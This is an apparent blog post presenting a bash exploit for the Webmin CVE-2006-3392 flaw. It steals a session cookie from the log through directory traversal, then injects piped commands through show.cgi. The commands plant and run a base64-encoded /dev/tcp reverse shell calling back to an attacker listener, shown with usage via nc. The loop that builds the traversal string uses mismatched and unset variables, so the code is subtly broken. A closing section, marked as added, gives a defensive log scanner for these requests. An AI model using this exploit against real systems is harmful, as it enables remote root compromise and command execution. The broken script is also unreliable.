CVE-2006-3392 Exploit Code

By Marshall Whittaker
#!/bin/bash
# Author: oxagast / Marshall Whittaker
# marshall@oxagast.org
# Thanks: enki
#
# girl i know you like this eggplant
# CVE-2006-3392
# https://oxasploits.com/posts/exploit-archive-partial-disclosure/

HOST=$1
PORT=$2
LHOST=$3
LPORT=$4
if [ $# -lt 4 ]; then
  echo "Webmin <1.29 remote root exploit by oxagast"
  echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE."
  echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!"
  echo "Usage:"
  echo "  nc -l -p 7777"
  echo "  $0 10.0.0.4 10000 10.0.0.3 7777"
else
  CMD=$(echo "bash -p -i >& /dev/tcp/$LHOST/$LPORT 0>&1" | base64)
  echo $CMD
  CMD0="echo $CMD > /tmp/b64s"
  CMD1='base64 -d /tmp/b64s > /tmp/she11'
  CMD2='chmod a+x /tmp/she11'
  CMD3='/bin/bash /tmp/she11'
  echo "Webmin <1.29 remote root exploit by oxagast"
  echo "Server: $HOST:$PORT"
  echo "Getting cookie from webmin log..."
  for i in {1..20}; do
    ONONE=$OHONE"..%01"
  done
  SID=$(curl $HOST:$PORT/unauthenticated/$HA/var/webmin/webmin.log -s | tail -n 1 | cut -f 5 -d ' ' | tr -d '\n')
  echo "Setting cookie to: sid=$SID"
  echo "Copying base64 encoded shell..."

  UA='User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
  ACCEPT='Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
  LANG='Accept-Language: en-US,en;q=0.5'
  CONN='Connection: keep-alive'
  UPG='Upgrade-Insecure-Requests: 1'
  COOK="Cookie: testing=1; sid=$SID"

  curl --header "Host: $HOST:$PORT" --header $UA --header $ACCEPT --header $LANG --header $CONN --header $UPG --header $COOK "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD0|" -s -L
  sleep 1
  echo "Debase64ing shell..."
  curl --header "Host: $HOST:$PORT" --header $UA --header $ACCEPT --header $LANG --header $CONN --header $UPG --header $COOK "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD1|" -s -L
  sleep 1
  echo "Chmodding shell..."
  curl --header "Host: $HOST:$PORT" --header $UA --header $ACCEPT --header $LANG --header $CONN --header $UPG --header $COOK "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD2|" -s -L
  sleep 1
  echo "Trying to spawn..."
  curl --header "Host: $HOST:$PORT" --header $UA --header $ACCEPT --header $LANG --header $CONN --header $UPG --header $COOK "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD3|" -s -L
fi
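
For defenders, the two request shapes this script sends can be matched in web access logs. The following is an added example, not part of the original post; the CLF-style log layout, the function names and the sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): flag the two request shapes the
# script above sends, in CLF-style access log lines. Log layout is an assumption.

# classify_request PATH -> traversal | pipe-injection | clean
classify_request() {
  case $1 in
    # "..%01" sequences under /unauthenticated/ (the log-read step)
    /unauthenticated/*..%01*) echo traversal ;;
    # raw or percent-encoded pipe after /file/show.cgi/ (the command step)
    /file/show.cgi/*'|'* | /file/show.cgi/*%7[Cc]*) echo pipe-injection ;;
    *) echo clean ;;
  esac
}

# scan_log: log lines on stdin -> "<verdict> <client> <path>" per suspicious line.
# A pipe-injection from a client that already sent a traversal is reported as "chain".
scan_log() {
  seen=" "
  while IFS= read -r line; do
    client=${line%% *}
    req=${line#*\"}; req=${req%%\"*}          # text inside the first quoted field
    path=${req#* }; path=${path% HTTP/*}      # drop method and protocol version
    verdict=$(classify_request "$path")
    case $verdict in
      clean) continue ;;
      traversal) seen="$seen$client " ;;
      pipe-injection)
        case $seen in *" $client "*) verdict=chain ;; esac ;;
    esac
    printf '%s %s %s\n' "$verdict" "$client" "$path"
  done
}

# Constructed sample input (addresses, timestamps and paths are made up).
sample_log() {
  cat <<'EOF'
10.0.0.3 - - [01/Jan/2023:10:00:01 +0000] "GET /unauthenticated/..%01/..%01/var/webmin/webmin.log HTTP/1.1" 200 512
10.0.0.3 - root [01/Jan/2023:10:00:03 +0000] "GET /file/show.cgi/bin/AAAF0|CMD| HTTP/1.1" 200 40
10.0.0.9 - admin [01/Jan/2023:10:01:00 +0000] "GET /file/show.cgi/etc/hosts HTTP/1.1" 200 220
10.0.0.7 - - [01/Jan/2023:10:02:00 +0000] "GET /unauthenticated/images/logo.gif HTTP/1.1" 200 900
10.0.0.8 - admin [01/Jan/2023:10:03:00 +0000] "GET /file/show.cgi/bin/x%7CCMD%7C HTTP/1.1" 200 40
EOF
}

sample_log | scan_log
```

A "chain" verdict means the same client read a file through the traversal and then reached show.cgi with a piped path, which is the sequence the script performs.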

This post is licensed under CC BY 4.0 by the author.
© 2023 Marshall Whittaker. Some rights reserved.